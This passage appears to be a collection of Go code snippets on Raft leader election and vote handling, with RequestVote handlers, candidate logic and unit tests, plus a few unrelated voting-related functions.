None\n\t\t\t\trf.mu.Unlock()\n\t\t\t\tif aLeaderComeUp {\n\t\t\t\t\treturn\n\t\t\t\t} else {\n\t\t\t\t\tif ok {\n\t\t\t\t\t\tmutex.Lock()\n\t\t\t\t\t\tcurrentSuccessNum++\n\t\t\t\t\t\tmutex.Unlock()\n\t\t\t\t\t\tif currentSuccessNum >= maxVoteNum/2+1 {\n\t\t\t\t\t\t\trf.mu.Lock()\n\t\t\t\t\t\t\trf.role = Leader\n\t\t\t\t\t\t\tfor i := 0; i < len(rf.peers); i++ {\n\t\t\t\t\t\t\t\trf.nextIndex[i] = len(rf.logs)\n\t\t\t\t\t\t\t\trf.matchIndex[i] = 0\n\t\t\t\t\t\t\t}\n\t\t\t\t\t\t\trf.mu.Unlock()\n\t\t\t\t\t\t\tgo rf.logDuplicate()\n\t\t\t\t\t\t\trf.msgChan <- BecomeLeader\n\t\t\t\t\t\t\treturn\n\t\t\t\t\t\t}\n\t\t\t\t\t}\n\t\t\t\t}\n\t\t\t}(i)\n\t\t}\n\t}\n\n}", "func TestNodePropose(t *testing.T) {\n\tvar msgs []pb.Message\n\tappendStep := func(r *raft, m pb.Message) error {\n\t\tmsgs = append(msgs, m)\n\t\treturn nil\n\t}\n\n\tn := newTestNode(1, []uint64{2, 3}, 0)\n\tgo n.Start()\n\n\tr := n.raft\n\tr.campaign()\n\n\tfor {\n\t\trd := <-n.Ready()\n\t\tif len(rd.Messages) != 0 {\n\t\t\tfor _, msg := range rd.Messages {\n\t\t\t\tif msg.Type == pb.MessageType_MsgVote {\n\t\t\t\t\tt.Log(\"get vote request\")\n\t\t\t\t\t//go func() {\n\t\t\t\t\tn.Step(context.TODO(), pb.Message{From: 2, To: 1, Term: msg.Term, Type: pb.MessageType_MsgVoteResp})\n\t\t\t\t\t//}()\n\t\t\t\t\tbreak\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\t\t// change the step function to appendStep until this raft becomes leader\n\t\tif r.leaderID == r.localID {\n\t\t\tr.step = appendStep\n\t\t\tn.Advance()\n\t\t\tbreak\n\t\t}\n\t\tn.Advance()\n\t}\n\tn.Propose(context.TODO(), []byte(\"somedata\"))\n\tn.Stop()\n\n\tif len(msgs) != 1 {\n\t\tt.Fatalf(\"len(msgs) = %d, want %d\", len(msgs), 1)\n\t}\n\tif msgs[0].Type != pb.MessageType_MsgProp {\n\t\tt.Errorf(\"msg type = %d, want %d\", msgs[0].Type, pb.MessageType_MsgProp)\n\t}\n\tif !bytes.Equal(msgs[0].Entries[0].Data, []byte(\"somedata\")) {\n\t\tt.Errorf(\"data = %v, want %v\", msgs[0].Entries[0].Data, []byte(\"somedata\"))\n\t}\n}", "func (r *RaftNode) Vote(rv RequestVoteStruct, response *RPCResponse) error {\n\tr.Lock()\n\tdefer r.Unlock()\n\tif r.verbose {\n\t\tlog.Println(\"Vote()\")\n\t}\n\n\tdefer r.persistState()\n\n\tresponse.Term = r.CurrentTerm\n\n\tmyLastLogTerm := r.getLastLogTerm()\n\tmyLastLogIdx := r.getLastLogIndex()\n\n\tif r.verbose {\n\t\tlog.Printf(\"RequestVoteStruct: %s. \\nMy node: term: %d, votedFor %d, lastLogTerm: %d, lastLogIdx: %d\",\n\t\t\trv.String(), r.CurrentTerm, r.VotedFor, myLastLogTerm, myLastLogIdx)\n\t}\n\n\tlooksEligible := r.CandidateLooksEligible(rv.LastLogIdx, rv.LastLogTerm)\n\n\tif rv.Term > r.CurrentTerm {\n\t\tr.shiftToFollower(rv.Term, HostID(-1)) // We do not yet know who is leader for this term\n\t}\n\n\tif rv.Term < r.CurrentTerm {\n\t\tif r.verbose {\n\t\t\tlog.Println(\"RV from prior term - do not grant vote\")\n\t\t}\n\t\tresponse.Success = false\n\t} else if (r.VotedFor == -1 || r.VotedFor == rv.CandidateID) && looksEligible {\n\t\tif r.verbose {\n\t\t\tlog.Println(\"Grant vote\")\n\t\t}\n\t\tr.resetTickers()\n\t\tresponse.Success = true\n\t\tr.VotedFor = rv.CandidateID\n\t} else {\n\t\tif r.verbose {\n\t\t\tlog.Println(\"Do not grant vote\")\n\t\t}\n\t\tresponse.Success = false\n\t}\n\n\treturn nil\n}", "func TestMsgVote(t *testing.T) {\n\ttests := []struct {\n\t\tsigners []sdk.AccAddress\n\t}{\n\t\t{addrs},\n\t\t{[]sdk.AccAddress{addrs[0]}},\n\t}\n\n\tfor i, tc := range tests {\n\t\tmsg := NewMsgVote(tc.voterAddr, tc.proposalID, tc.option)\n\t\tif tc.expectPass {\n\t\t\trequire.Nil(t, msg.ValidateBasic(), \"test: %v\", i)\n\t\t} else {\n\t\t\trequire.NotNil(t, msg.ValidateBasic(), \"test: %v\", i)\n\t\t}\n\t}\n}", "func TestElection_HasVoted(t *testing.T) {\n\ttestDatabase := database.StormDB{\n\t\tFile: \"election_testdb.db\",\n\t}\n\terr := testDatabase.Connect()\n\tif err != nil {\n\t\tt.Errorf(\"Couldn't connect to database. Error: %s\", err.Error())\n\t}\n\ttestVoter := models.Voter{\n\t\tStudentID: 1,\n\t\tCohort: 1,\n\t\tName: \"Prof Sturman\",\n\t}\n\ttestVoterWontVote := models.Voter{\n\t\tStudentID: 2,\n\t\tCohort: 1,\n\t\tName: \"Prof Goldschmidt\",\n\t}\n\ttestCandidate := models.Candidate{\n\t\tID: 1,\n\t\tCohort: 1,\n\t\tName: \"Joey Lyon\",\n\t}\n\n\terr = testDatabase.StoreVoter(testVoter)\n\tif err != nil {\n\t\tt.Errorf(\"Couldn't add test voter to database\")\n\t}\n\terr = testDatabase.StoreVoter(testVoterWontVote)\n\tif err != nil {\n\t\tt.Errorf(\"Couldn't add test voter to database\")\n\t}\n\terr = testDatabase.StoreCandidate(testCandidate)\n\tif err != nil {\n\t\tt.Errorf(\"Couldn't add test candidate to database\")\n\t}\n\n\te := New(&testDatabase, false, []string{})\n\t// Begin testing HasVoted function\n\tret, err := e.HasVoted(testVoter)\n\tif err != nil {\n\t\tt.Errorf(\"unexpected error in checking if voter has voted\")\n\t}\n\tif *ret {\n\t\tt.Errorf(\"HasVoted returned true when a voter hasn't voted\")\n\t}\n\n\tvote := &models.Vote{\n\t\tCandidate: 1,\n\t\tStudentID: 1,\n\t}\n\tvote.HashVote(&testVoter)\n\te.CastVotes(&testVoter, []models.Vote{*vote})\n\tret, err = e.HasVoted(testVoter)\n\tif err != nil {\n\t\tt.Errorf(\"unexpected error in checking if voter has voted\")\n\t}\n\tif *ret == false {\n\t\tt.Errorf(\"HasVoted returned false when a voter has voted\")\n\t}\n\n\tret, err = e.HasVoted(testVoterWontVote)\n\tif err != nil {\n\t\tt.Errorf(\"unexpected error in checking if voter has voted\")\n\t}\n\tif *ret {\n\t\tt.Errorf(\"HasVoted returned true when a voter has not voted\")\n\t}\n\terr = os.Remove(\"election_testdb.db\")\n\tif err != nil {\n\t\tt.Log(\"Cleanup failed\")\n\t}\n}", "func TestLeaderSyncFollowerLog(t *testing.T) {\n\tents := []pb.Entry{\n\t\t{},\n\t\t{Term: 1, Index: 1}, {Term: 1, Index: 2}, {Term: 1, Index: 3},\n\t\t{Term: 4, Index: 4}, {Term: 4, Index: 5},\n\t\t{Term: 5, Index: 6}, {Term: 5, Index: 7},\n\t\t{Term: 6, Index: 8}, {Term: 6, Index: 9}, {Term: 6, Index: 10},\n\t}\n\tterm := uint64(8)\n\ttests := [][]pb.Entry{\n\t\t{\n\t\t\t{},\n\t\t\t{Term: 1, Index: 1}, {Term: 1, Index: 2}, {Term: 1, Index: 3},\n\t\t\t{Term: 4, Index: 4}, {Term: 4, Index: 5},\n\t\t\t{Term: 5, Index: 6}, {Term: 5, Index: 7},\n\t\t\t{Term: 6, Index: 8}, {Term: 6, Index: 9},\n\t\t},\n\t\t{\n\t\t\t{},\n\t\t\t{Term: 1, Index: 1}, {Term: 1, Index: 2}, {Term: 1, Index: 3},\n\t\t\t{Term: 4, Index: 4},\n\t\t},\n\t\t{\n\t\t\t{},\n\t\t\t{Term: 1, Index: 1}, {Term: 1, Index: 2}, {Term: 1, Index: 3},\n\t\t\t{Term: 4, Index: 4}, {Term: 4, Index: 5},\n\t\t\t{Term: 5, Index: 6}, {Term: 5, Index: 7},\n\t\t\t{Term: 6, Index: 8}, {Term: 6, Index: 9}, {Term: 6, Index: 10}, {Term: 6, Index: 11},\n\t\t},\n\t\t{\n\t\t\t{},\n\t\t\t{Term: 1, Index: 1}, {Term: 1, Index: 2}, {Term: 1, Index: 3},\n\t\t\t{Term: 4, Index: 4}, {Term: 4, Index: 5},\n\t\t\t{Term: 5, Index: 6}, {Term: 5, Index: 7},\n\t\t\t{Term: 6, Index: 8}, {Term: 6, Index: 9}, {Term: 6, Index: 10},\n\t\t\t{Term: 7, Index: 11}, {Term: 7, Index: 12},\n\t\t},\n\t\t{\n\t\t\t{},\n\t\t\t{Term: 1, Index: 1}, {Term: 1, Index: 2}, {Term: 1, Index: 3},\n\t\t\t{Term: 4, Index: 4}, {Term: 4, Index: 5}, {Term: 4, Index: 6}, {Term: 4, Index: 7},\n\t\t},\n\t\t{\n\t\t\t{},\n\t\t\t{Term: 1, Index: 1}, {Term: 1, Index: 2}, {Term: 1, Index: 3},\n\t\t\t{Term: 2, Index: 4}, {Term: 2, Index: 5}, {Term: 2, Index: 6},\n\t\t\t{Term: 3, Index: 7}, {Term: 3, Index: 8}, {Term: 3, Index: 9}, {Term: 3, Index: 10}, {Term: 3, Index: 11},\n\t\t},\n\t}\n\tfor i, tt := range tests {\n\t\tleadStorage := NewMemoryStorage()\n\t\tdefer leadStorage.Close()\n\t\tleadStorage.Append(ents)\n\t\tlead := newTestRaft(1, []uint64{1, 2, 3}, 10, 1, leadStorage)\n\t\tlead.loadState(pb.HardState{Commit: lead.raftLog.lastIndex(), Term: term})\n\t\tfollowerStorage := NewMemoryStorage()\n\t\tdefer followerStorage.Close()\n\t\tfollowerStorage.Append(tt)\n\t\tfollower := newTestRaft(2, []uint64{1, 2, 3}, 10, 1, followerStorage)\n\t\tfollower.loadState(pb.HardState{Term: term - 1})\n\t\t// It is necessary to have a three-node cluster.\n\t\t// The second may have more up-to-date log than the first one, so the\n\t\t// first node needs the vote from the third node to become the leader.\n\t\tn := newNetwork(lead, follower, nopStepper)\n\t\tn.send(pb.Message{From: 1, To: 1, Type: pb.MsgHup})\n\t\t// The election occurs in the term after the one we loaded with\n\t\t// lead.loadState above.\n\t\tn.send(pb.Message{From: 3, To: 1, Type: pb.MsgVoteResp, Term: term + 1})\n\n\t\tn.send(pb.Message{From: 1, To: 1, Type: pb.MsgProp, Entries: []pb.Entry{{}}})\n\n\t\tif g := diffu(ltoa(lead.raftLog), ltoa(follower.raftLog)); g != \"\" {\n\t\t\tt.Errorf(\"#%d: log diff:\\n%s\", i, g)\n\t\t}\n\t}\n}", "func (rf *Raft) RequestVote(args RequestVoteArgs, reply *RequestVoteReply) error {\n\trf.mu.Lock()\n\tdefer rf.mu.Unlock()\n\tif rf.state == Down {\n\t\treturn nil\n\t}\n\tlastLogIdx, lastLogTerm := rf.lastLogIdxAndTerm()\n\tlog.Printf(\"[%v] received RequestVote RPC: %+v [currentTerm=%d votedFor=%d lastLogIdx=%d lastLogTerm=%d]\",\n\t\trf.me, args, rf.currentTerm, rf.votedFor, lastLogIdx, lastLogTerm)\n\tif args.Term > rf.currentTerm {\n\t\t// Raft rfServer in past term, revert to follower (and reset its state)\n\t\tlog.Printf(\"[%v] RequestVoteArgs.Term=%d bigger than currentTerm=%d\",\n\t\t\trf.me, args.Term, rf.currentTerm)\n\t\trf.toFollower(args.Term)\n\t}\n\n\t// if hasn't voted or already voted for this candidate or\n\t// if the candidate has up-to-date log (section 5.4.1 from paper) ...\n\tif rf.currentTerm == args.Term &&\n\t\t(rf.votedFor == -1 || rf.votedFor == args.Candidate) &&\n\t\t(args.LastLogTerm > lastLogTerm ||\n\t\t\t(args.LastLogTerm == lastLogTerm && args.LastLogIndex >= lastLogIdx)) {\n\t\t// ... grant vote\n\t\treply.VoteGranted = true\n\t\trf.votedFor = args.Candidate\n\t\trf.resetElection = time.Now()\n\t} else {\n\t\treply.VoteGranted = false\n\t}\n\treply.Term = rf.currentTerm\n\trf.persist()\n\tlog.Printf(\"[%v] replying to RequestVote: %+v\", rf.me, reply)\n\treturn nil\n}", "func (rf *Raft) BeFollower(term int) {\n\t//////fmt.Print(\"%d become follower\\n\", rf.me)\n\trf.state = Follower\n\trf.currentTerm = term\n\trf.votedFor = NULL\n}", "func (rf *Raft) RequestVote(args *RequestVoteArgs, reply *RequestVoteReply) {\n\t// Your code here (2A, 2B).\n\t//fmt.Println(\"got vote request at server id: \", rf.me)\n\trf.mu.Lock()\n\tdefer rf.mu.Unlock()\n\n\tif rf.currentTerm > args.Term {\n\t\treply.VoteGranted = false\n\t\treply.Term = rf.currentTerm\n\t\treturn\n\t} else if rf.currentTerm < args.Term {\n\t\trf.currentTerm = args.Term\n\t\treply.Term = rf.currentTerm\n\t\trf.state = follower\n\t}\n\t\n\tgranted := false\n\tif rf.votedFor == nil {\n\t\tgranted = true\n\t} else if *rf.votedFor == args.CandidateId {\n\t\tgranted = true\n\t}\n\tif !granted {\n\t\treply.VoteGranted = false\n\t\treturn\n\t}\n\n\tif args.LastLogIndex != len(rf.log)-1 {\n\t\tgranted = false\n\t} else {\n\t\tif args.LastLogTerm != rf.log[len(rf.log)-1].Term {\n\t\t\tgranted = false\n\t\t}\n\t}\n\t\n\tif !granted {\n\t\treply.VoteGranted = false\n\t\treturn\n\t}\n\n\treply.VoteGranted = true\n\trf.rpcCh<-voteRpc\n\treturn\n}", "func (rf *Raft) RequestVote(args RequestVoteArgs, reply *RequestVoteReply) {\n\t// Your code here.\n\trf.mu.Lock()\n\tdefer rf.mu.Unlock()\n\n\tmay_grant_vote := true\n\tif len(rf.logs) > 0 {\n\t\t// rf.logs_term[len(rf.logs)-1] will always there, no matter snapshotedCount\n\t\tif rf.logs_term[len(rf.logs)-1] > args.LastLogTerm ||\n\t\t\t(rf.logs_term[len(rf.logs)-1] == args.LastLogTerm && len(rf.logs) > args.LogCount) {\n\t\t\tmay_grant_vote = false\n\t\t}\n\t}\n\trf.logger.Printf(\"Got vote request: %v, may grant vote: %v\\n\", args, may_grant_vote)\n\n\tif args.Term < rf.currentTerm {\n\t\trf.logger.Printf(\"Got vote request with term = %v, reject\\n\", args.Term)\n\t\treply.Term = rf.currentTerm\n\t\treply.Granted = false\n\t\treturn\n\t}\n\n\tif args.Term == rf.currentTerm {\n\t\trf.logger.Printf(\"Got vote request with current term, now voted for %v\\n\", rf.votedFor)\n\t\tif rf.votedFor == -1 && may_grant_vote {\n\t\t\trf.votedFor = args.CandidateID\n\t\t\trf.persist()\n\t\t}\n\t\treply.Granted = (rf.votedFor == args.CandidateID)\n\t\treply.Term = rf.currentTerm\n\t\treturn\n\t}\n\tif args.Term > rf.currentTerm {\n\t\trf.logger.Printf(\"Got vote request with term = %v, follow it\\n\", args.Term)\n\t\trf.state = FOLLOWER\n\t\trf.currentTerm = args.Term\n\t\trf.votedFor = -1\n\t\tif may_grant_vote {\n\t\t\trf.votedFor = args.CandidateID\n\t\t\trf.persist()\n\t\t}\n\t\trf.resetTimer()\n\n\t\treply.Granted = (rf.votedFor == args.CandidateID)\n\t\treply.Term = args.Term\n\t\treturn\n\t}\n}", "func (r *Raft) callRequestVote(server int, args requestVoteArgs, reply *requestVoteReply) bool {\n\t// When there are no peers, return a test response, if any.\n\tif len(r.peers) == 0 {\n\t\t// Under test, return injected reply.\n\t\tglog.V(2).Infof(\"Under test, returning injected reply %v\", reply)\n\t\tif r.testRequestvotesuccess {\n\t\t\t*reply = *r.testRequestvotereply\n\t\t}\n\t\treturn r.testRequestvotesuccess\n\t}\n\tok := r.peers[server].Call(\"Raft.RequestVote\", args, reply)\n\treturn ok\n}", "func (rf *Raft) RequestVote(args *RequestVoteArgs, reply *RequestVoteReply) {\n\trf.mu.Lock()\n\tdefer rf.mu.Unlock()\n\tdefer rf.persist()\n\n\treply.VoteGranted = false\n\treply.Term = rf.currentTerm\n\n\t// Rule for all servers: If RPC request or response contains term T > currentTerm: set currentTerm = T, convert to follower (§5.1)\n\tif args.Term > rf.currentTerm {\n\t\trf.convertToFollower(args.Term)\n\t}\n\n\t// 1. Reply false if term < currentTerm (§5.1)\n\tif args.Term < rf.currentTerm {\n\t\t_, _ = DPrintf(vote(\"[T%v] %v: Received RequestVote from %v | Discarded Vote | Received Lower Term \"), rf.currentTerm, rf.me, args.CandidateID, args.CandidateID)\n\t\treturn\n\t}\n\n\t/* 2. If\n\t *\t\t1. votedFor is null or candidateId\n\t *\t\t2. candidate’s log is at least as up-to-date as receiver’s log\n\t *\tgrant vote (§5.2, §5.4)\n\t */\n\n\t// Check 1 vote: should be able to vote or voted for candidate\n\tvoteCheck := rf.votedFor == noVote || rf.votedFor == args.CandidateID\n\t// Check 2 up-to-date = (same indices OR candidate's lastLogIndex > current peer's lastLogIndex)\n\tlastLogIndex, lastLogTerm := rf.lastLogEntryIndex(), rf.lastLogEntryTerm()\n\tlogCheck := lastLogTerm < args.LastLogTerm || (lastLogTerm == args.LastLogTerm && lastLogIndex <= args.LastLogIndex)\n\n\t// Both checks should be true to grant vote\n\tif voteCheck && logCheck {\n\t\treply.VoteGranted = true\n\t\t_, _ = DPrintf(vote(\"[T%v] %v: Received RequestVote from %v | Vote Successful\"), rf.currentTerm, rf.me, args.CandidateID)\n\t\trf.currentTerm = args.Term\n\t\trf.votedFor = args.CandidateID\n\t} else if !voteCheck {\n\t\t_, _ = DPrintf(vote(\"[T%v] %v: Received RequestVote from %v | Vote Failure | Already voted for %v\"), rf.currentTerm, rf.me, args.CandidateID, rf.votedFor)\n\t} else {\n\t\t_, _ = DPrintf(vote(\"[T%v] %v: Received RequestVote from %v | Vote Failure | No Up-To-Date Log | Received {LastLogTerm: %v, LastLogIndex: %v} | Current {LastLogTerm: %v, LastLogIndex: %v}\"),\n\t\t\trf.currentTerm, rf.me, args.CandidateID, args.LastLogTerm, args.LastLogIndex, lastLogTerm, lastLogIndex)\n\t}\n\trf.resetTTL()\n}", "func (s *speaker) DecideVote(ruleMatrix rules.RuleMatrix, aliveClients []shared.ClientID) shared.SpeakerReturnContent {\n\t//(there are more important things to do) or (there is no rule to vote on)\n\tif s.getSpeakerBudget() < s.getHigherPriorityActionsCost(\"SetVotingResult\") || ruleMatrix.RuleMatrixIsEmpty() {\n\t\treturn shared.SpeakerReturnContent{\n\t\t\tActionTaken: false,\n\t\t}\n\t}\n\treturn shared.SpeakerReturnContent{\n\t\tContentType: shared.SpeakerVote,\n\t\tParticipatingIslands: aliveClients,\n\t\tRuleMatrix: ruleMatrix,\n\t\tActionTaken: true,\n\t}\n}", "func (rf *Raft) RequestVote(args *RequestVoteArgs, reply *RequestVoteReply) {\n\t// Your code here (2A, 2B).\n\trf.mu.Lock()\n\tif args.Term < rf.currentTerm {\n\t\treply.Term = rf.currentTerm\n\t\treply.VoteGranted = false\n\t\trf.mu.Unlock()\n\t\treturn\n\t}\n\t// follow the second rule in \"Rules for Servers\" in figure 2 before handling an incoming RPC\n\tif args.Term > rf.currentTerm {\n\t\trf.currentTerm = args.Term\n\t\trf.state = FOLLOWER\n\t\trf.votedFor = -1\n\t\trf.persist()\n\t}\n\n\treply.Term = rf.currentTerm\n\treply.VoteGranted = true\n\t// deny vote if already voted\n\tif rf.votedFor != -1 {\n\t\treply.VoteGranted = false\n\t\trf.mu.Unlock()\n\t\treturn\n\t}\n\t// deny vote if consistency check fails (candidate is less up-to-date)\n\tlastLog := rf.log[len(rf.log)-1]\n\tif args.LastLogTerm < lastLog.Term || (args.LastLogTerm == lastLog.Term && args.LastLogIndex < len(rf.log)-1) {\n\t\treply.VoteGranted = false\n\t\trf.mu.Unlock()\n\t\treturn\n\t}\n\t// now this peer must vote for the candidate\n\trf.votedFor = args.CandidateID\n\trf.mu.Unlock()\n\n\trf.resetTimer()\n}", "func (rf *Raft) RequestVote(args *RequestVoteArgs, reply *RequestVoteReply) {\n\t// Your code here (2A, 2B).\n\trf.mu.Lock()\n\tdefer rf.mu.Unlock()\n\n\tif rf.currentTerm < args.Term {\n\t\trf.debug(\"Updating term to new term %v\\n\", args.Term)\n\t\trf.currentTerm = args.Term\n\t\tatomic.StoreInt32(&rf.state, FOLLOWER)\n\t\trf.votedFor = LEADER_UNKNOWN\n\t}\n\n\treply.Term = rf.currentTerm\n\treply.VoteGranted = false\n\n\t// late candidates\n\tif args.Term < rf.currentTerm {\n\t\trf.debug(\"Rejecting candidate %v. Reason: late term=%v\\n\", args.CandidateId, args.Term)\n\t\treturn\n\t}\n\n\t// avoid double vote\n\tif rf.votedFor != LEADER_UNKNOWN && rf.votedFor != args.CandidateId {\n\t\trf.debug(\"Rejecting candidate %v. Reason: already voted\\n\", args.CandidateId)\n\t\treturn\n\t}\n\n\tlastLogIndex := rf.lastEntryIndex()\n\n\t// reject old logs\n\tif rf.index(lastLogIndex).Term > args.LastLogTerm {\n\t\trf.debug(\"Rejecting candidate %v. Reason: old log\\n\", args.CandidateId)\n\t\treturn\n\t}\n\n\t// log is smaller\n\tif rf.index(lastLogIndex).Term == args.LastLogTerm && args.LastLogIndex < lastLogIndex {\n\t\trf.debug(\"Rejecting candidate %v. Reason: small log\\n\", args.CandidateId)\n\t\treturn\n\t}\n\n\trf.votedFor = args.CandidateId\n\trf.gotContacted = true\n\n\trf.debug(\"Granting vote to %v. me=(%v,%v), candidate=(%v,%v)\\n\", args.CandidateId, lastLogIndex, rf.index(lastLogIndex).Term, args.LastLogIndex, args.LastLogTerm)\n\treply.VoteGranted = true\n\n\t// save state\n\trf.persist(false)\n}", "func (rf *Raft) RequestVote(args RequestVoteArgs, reply *RequestVoteReply) {\n\trf.mu.Lock()\n\tdefer rf.mu.Unlock()\n\tdefer rf.persist()\n\n\tif args.Term > rf.currentTerm {\n\t\trf.convert2Follower(args.Term)\n\t}\n\n\treply.Term = rf.currentTerm\n\treply.VoteGranted = false\n\n\tif args.Term < rf.currentTerm {\n\t\treturn\n\t}\n\n\tlastLogTerm := rf.getLastLogTerm()\n\tlastLogIndex := rf.getLastLogIndex()\n\t// voted-none && least-up-to-date\n\n\tup2Date := false\n\tif lastLogTerm < args.LastLogTerm {\n\t\tup2Date = true\n\t}\n\tif lastLogTerm == args.LastLogTerm && lastLogIndex <= args.LastLogIndex {\n\t\tup2Date = true\n\t}\n\n\tif up2Date && (rf.votedFor == -1 || rf.votedFor == args.CandidateId) {\n\t\treply.VoteGranted = true\n\t\trf.votedFor = args.CandidateId\n\t\t// DPrintf(\"Server [%v] vote [%v] for Term [%v]\", rf.me, args.CandidateId, rf.currentTerm)\n\t}\n}", "func (rf *Raft) RequestVote(args *RequestVoteArgs, reply *RequestVoteReply) {\n\t// Your code here (2A, 2B).\n\trf.mu.Lock()\n\tdefer rf.mu.Unlock()\n\treply.VoterId = rf.peerId\n\tif args.Term < rf.currentTerm {\n\t\treply.Term = rf.currentTerm\n\t\treply.VoteGranted = false\n\t\treturn\n\t}\n\tif args.Term > rf.currentTerm {\n\t\trf.stepDownToFollower(args.Term)\n\t}\n\tlastLog := rf.getLastLog()\n\tif (rf.votedFor == \"\" || rf.votedFor == args.CandidateId) && (lastLog.Term < args.LastLogTerm || (lastLog.Index <= args.LastLogIndex && lastLog.Term == args.LastLogTerm)) {\n\t\treply.Term = rf.currentTerm\n\t\trf.grantCh <- true\n\t\treply.VoteGranted = true\n\t\t// set voteFor\n\t\trf.votedFor = args.CandidateId\n\t\tlog.Printf(\"peer %v elect peer %v as leader\\n\", rf.peerId, args.CandidateId)\n\t}\n\treturn\n}", "func testCandidateResetTerm(t *testing.T, mt pb.MessageType) {\n\ta := newTestRaft(1, []uint64{1, 2, 3}, 10, 1, NewMemoryStorage())\n\tb := newTestRaft(2, []uint64{1, 2, 3}, 10, 1, NewMemoryStorage())\n\tc := newTestRaft(3, []uint64{1, 2, 3}, 10, 1, NewMemoryStorage())\n\n\tnt := newNetwork(a, b, c)\n\tdefer nt.closeAll()\n\n\tnt.send(pb.Message{From: 1, To: 1, Type: pb.MsgHup})\n\tif a.state != StateLeader {\n\t\tt.Errorf(\"state = %s, want %s\", a.state, StateLeader)\n\t}\n\tif b.state != StateFollower {\n\t\tt.Errorf(\"state = %s, want %s\", b.state, StateFollower)\n\t}\n\tif c.state != StateFollower {\n\t\tt.Errorf(\"state = %s, want %s\", c.state, StateFollower)\n\t}\n\n\t// isolate 3 and increase term in rest\n\tnt.isolate(3)\n\n\tnt.send(pb.Message{From: 2, To: 2, Type: pb.MsgHup})\n\tnt.send(pb.Message{From: 1, To: 1, Type: pb.MsgHup})\n\n\tif a.state != StateLeader {\n\t\tt.Errorf(\"state = %s, want %s\", a.state, StateLeader)\n\t}\n\tif b.state != StateFollower {\n\t\tt.Errorf(\"state = %s, want %s\", b.state, StateFollower)\n\t}\n\n\t// trigger campaign in isolated c\n\tc.resetRandomizedElectionTimeout()\n\tfor i := 0; i < c.randomizedElectionTimeout; i++ {\n\t\tc.tick()\n\t}\n\n\tif c.state != StateCandidate {\n\t\tt.Errorf(\"state = %s, want %s\", c.state, StateCandidate)\n\t}\n\n\tnt.recover()\n\n\t// leader sends to isolated candidate\n\t// and expects candidate to revert to follower\n\tnt.send(pb.Message{From: 1, To: 3, Term: a.Term, Type: mt})\n\n\tif c.state != StateFollower {\n\t\tt.Errorf(\"state = %s, want %s\", c.state, StateFollower)\n\t}\n\n\t// follower c term is reset with leader's\n\tif a.Term != c.Term {\n\t\tt.Errorf(\"follower term expected same term as leader's %d, got %d\", a.Term, c.Term)\n\t}\n}", "func (rf *Raft) ExecuteCandidate(args *RequestVoteArgs) {\n\n\t//Send request vote to peer servers and parse response\n\tfor i, _ := range rf.peers {\n\t\tif i != rf.me {\n\t\t\treply := &RequestVoteReply{}\n\t\t\tgo rf.sendRequestVote(i, args, reply)\n\t\t}\n\t}\n}", "func (r *Raft) countVotes() (voteCount int) {\n\tfor i := 0; i < noOfServers; i++ {\n\t\tif r.f_specific[i].vote {\n\t\t\tvoteCount += 1\n\t\t}\n\t}\n\n\treturn\n}", "func (rf *Raft) RequestVote(args RequestVoteArgs, reply *RequestVoteReply) {\n\t// Your code here.\n\trf.mu.Lock()\n\tdefer rf.mu.Unlock()\n\n\tbbit := true\n\tif len(rf.log) > 0 {\n\t\tlastLogTerm := rf.log[len(rf.log)-1].Term\n\t\tif lastLogTerm > args.LastLogTerm {\n\t\t\tbbit = false\n\t\t} else if lastLogTerm == args.LastLogTerm &&\n\t\t\tlen(rf.log)-1 > args.LastLogIndex {\n\t\t\tbbit = false\n\t\t}\n\t}\n\n\tif args.Term < rf.currentTerm {\n\t\treply.Term = rf.currentTerm\n\t\treply.VoteGranted = false\n\t\treturn\n\t}\n\tif args.Term == rf.currentTerm {\n\t\treply.Term = rf.currentTerm\n\t\tif rf.votedFor == -1 && bbit {\n\t\t\trf.votedFor = args.CandidateId\n\t\t\trf.persist()\n\t\t\treply.VoteGranted = true\n\t\t} else {\n\t\t\treply.VoteGranted = false\n\t\t}\n\t\treturn\n\t}\n\tif args.Term > rf.currentTerm {\n\t\trf.state = FOLLOWER\n\t\trf.currentTerm = args.Term\n\t\trf.votedFor = -1\n\t\trf.timer.Reset(properTimeDuration(rf.state))\n\t\treply.Term = args.Term\n\t\tif bbit {\n\t\t\trf.votedFor = args.CandidateId\n\t\t\trf.persist()\n\t\t\treply.VoteGranted = true\n\t\t} else {\n\t\t\treply.VoteGranted = false\n\t\t}\n\t\treturn\n\t}\n\treturn\n}", "func (rf *Raft) sendRequestVote(server int, args *RequestVoteArgs, reply *RequestVoteReply, voteCount *int32) bool {\n\tok := rf.peers[server].Call(\"Raft.RequestVote\", args, reply)\n\tlog.Printf(\"peer %v request vote to peer %v result %v\", rf.peerId, reply.VoterId, reply)\n\tif !ok {\n\t\treturn ok\n\t}\n\n\trf.mu.Lock()\n\tdefer rf.mu.Unlock()\n\tif rf.getState() != Candidate || args.Term != rf.currentTerm {\n\t\treturn ok\n\t}\n\tif reply.Term > rf.currentTerm {\n\t\trf.stepDownToFollower(reply.Term)\n\t}\n\tif reply.VoteGranted {\n\t\tatomic.AddInt32(voteCount, 1)\n\t}\n\tif int(atomic.LoadInt32(voteCount)) > len(rf.peers)/2 {\n\t\trf.setState(Leader)\n\t\trf.electAsLeaderCh <- true\n\t}\n\treturn ok\n}", "func (r *Raft) candidate() int {\n\t//myId := r.Myconfig.Id\n\t//fmt.Println(\"Election started!I am\", myId)\n\n\t//reset the votes else it will reflect the votes received in last term\n\tr.resetVotes()\n\n\t//--start election timer for election-time out time, so when responses stop coming it must restart the election\n\n\twaitTime := 10\n\t//fmt.Println(\"ELection timeout is\", waitTime)\n\tElectionTimer := r.StartTimer(ElectionTimeout, waitTime)\n\t//This loop is for election process which keeps on going until a leader is elected\n\tfor {\n\t\tr.currentTerm = r.currentTerm + 1 //increment current term\n\t\t//fmt.Println(\"I am candidate\", r.Myconfig.Id, \"and current term is now:\", r.currentTerm)\n\n\t\tr.votedFor = r.Myconfig.Id //vote for self\n\t\tr.WriteCVToDisk() //write Current term and votedFor to disk\n\t\tr.f_specific[r.Myconfig.Id].vote = true\n\n\t\t//fmt.Println(\"before calling prepRV\")\n\t\treqVoteObj := r.prepRequestVote() //prepare request vote obj\n\t\t//fmt.Println(\"after calling prepRV\")\n\t\tr.sendToAll(reqVoteObj) //send requests for vote to all servers\n\t\t//this loop for reading responses from all servers\n\t\tfor {\n\t\t\treq := r.receive()\n\t\t\tswitch req.(type) {\n\t\t\tcase RequestVoteResponse: //got the vote response\n\t\t\t\tresponse := req.(RequestVoteResponse) //explicit typecasting so that fields of struct can be 